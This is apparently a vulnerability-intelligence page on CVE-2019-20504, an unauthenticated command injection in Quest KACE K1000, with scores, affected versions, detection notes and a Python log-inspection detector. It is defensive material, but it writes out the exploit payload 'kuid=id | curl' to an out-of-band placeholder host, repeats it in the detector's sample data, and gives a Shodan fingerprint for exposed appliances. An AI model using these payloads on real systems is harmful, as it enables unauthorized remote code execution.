CVE-2019-20504
published 2020-03-09

CVE-2019-20504: service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell…

Priority: P181 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 9.18% (94.7th percentile)
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|--------|---------|---------------|----------|
| quest | kace_systems_management | < 6.4.120822 | 6.4.120822 |

Detection & IOCs (extracted from sources)

path: /service/krashrpt.php
command: POST /service/krashrpt.php HTTP/1.1
command: kuid=id | curl http://{{interactsh-url}}
  • Detect exploitation attempts by monitoring POST requests to /service/krashrpt.php containing shell metacharacters (e.g., |, ;, `, $()) in the 'kuid' parameter.
  • Use an out-of-band (OOB) DNS/HTTP interaction callback to confirm blind RCE — the exploit PoC uses 'kuid=id | curl http://<interactsh-url>' and confirms exploitation via DNS interaction.
  • Fingerprint vulnerable K1000 appliances exposed on the internet via Shodan using the HTML keyword 'K1000 Logo'.
  • The endpoint /service/krashrpt.php is unauthenticated; any POST to this path with a 'kuid' parameter containing shell metacharacters should be treated as a high-confidence attack indicator.
  • The Nuclei template uses a two-step flow: first confirming the target is a K1000 appliance (body contains 'K1000'), then sending the exploit payload. Detection logic should similarly chain host fingerprinting with payload inspection to reduce false positives.
  • Exploitation is confirmed via out-of-band DNS callback (interactsh), meaning network-level egress filtering on the target appliance may prevent callback-based detection even when the vulnerability is present and exploitable.
  • Affected versions are strictly before 6.4 SP3 (6.4.120822); version 6.4.120756 is explicitly cited as vulnerable. Detections should be scoped to these versions.
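
The request-inspection logic described in the notes above, as an added example (not taken from the advisory, the Nuclei template, or the vendor). It assumes requests have already been parsed from proxy or WAF logs into dicts with `host`, `method`, `uri` and `body` fields, and that `k1000_hosts` comes from your own asset inventory; those field names, the hostnames and the sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

TARGET_PATH = "/service/krashrpt.php"
# |, ;, ` and $( are the metacharacters the page lists; & and CR/LF are an
# assumption added here.
SHELL_META = re.compile(r"[|;`&\r\n]|\$\(")

def classify(req, k1000_hosts):
    """Return 'alert', 'review' or None for one parsed HTTP request."""
    if req["method"].upper() != "POST":
        return None
    raw_path, _, query = req["uri"].partition("?")
    # Decode and collapse duplicate slashes so /service//krashrpt.php still matches.
    if re.sub(r"/+", "/", unquote(raw_path)) != TARGET_PATH:
        return None
    # parse_qs percent-decodes, so an encoded %7C is inspected as "|".
    values = []
    for part in (query, req["body"]):
        values += parse_qs(part, keep_blank_values=True).get("kuid", [])
    if not any(SHELL_META.search(v) for v in values):
        return None
    # Chain payload inspection with host fingerprinting, as the page suggests.
    return "alert" if req["host"] in k1000_hosts else "review"

def scan(records, k1000_hosts):
    """Return (record index, verdict) for every record that is flagged."""
    return [(i, v) for i, r in enumerate(records)
            if (v := classify(r, k1000_hosts))]

# Constructed sample data (not real traffic); hostnames are placeholders.
K1000_HOSTS = {"kace.corp.example"}
SAMPLE = [
    {"host": "kace.corp.example", "method": "POST", "uri": "/service/krashrpt.php",
     "body": "kuid=id | curl http://oob.example.invalid"},
    {"host": "kace.corp.example", "method": "POST", "uri": "/service/krashrpt.php",
     "body": "kuid=4f2a9c1e7b3d"},
    {"host": "web01.corp.example", "method": "POST", "uri": "/service//krashrpt.php",
     "body": "kuid=id+%7C+curl+http%3A%2F%2Foob.example.invalid"},
    {"host": "kace.corp.example", "method": "GET",
     "uri": "/service/krashrpt.php?kuid=a%3Bb", "body": ""},
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE, K1000_HOSTS):
        print(idx, verdict)
```

A `review` verdict marks a matching payload sent to a host that is not in the inventory, which is worth checking for an untracked appliance or internet-wide scanning.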

CVSS provenance

nvd · v3.1 · 9.8 · CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 9.8 · CRITICAL